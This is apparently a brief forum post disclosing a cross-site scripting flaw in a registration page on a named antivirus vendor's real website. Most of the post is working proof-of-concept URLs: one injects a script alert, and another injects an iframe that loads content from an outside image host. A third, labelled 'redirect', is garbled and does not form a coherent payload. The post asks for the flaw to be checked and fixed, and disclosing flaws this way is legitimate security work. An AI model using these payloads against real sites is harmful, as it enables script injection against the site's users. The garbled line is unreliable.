another critical xss bug was found ,so maybe someone want to check and fix it

https://secure.avast.com/scripts/register.php?lang=?"><script>alert(/XSS/)</script>

redirect:

https://secure.avast.com/scripts/register.php?lang=?“>”">>>> “”

iframe injection:

https://secure.avast.com/scripts/register.php?lang=?https://secure.avast.com/scripts/register.php?lang=?'"><iframe src=http://img164.imageshack.us/img164/899/63094193mx7.jpg></iframe>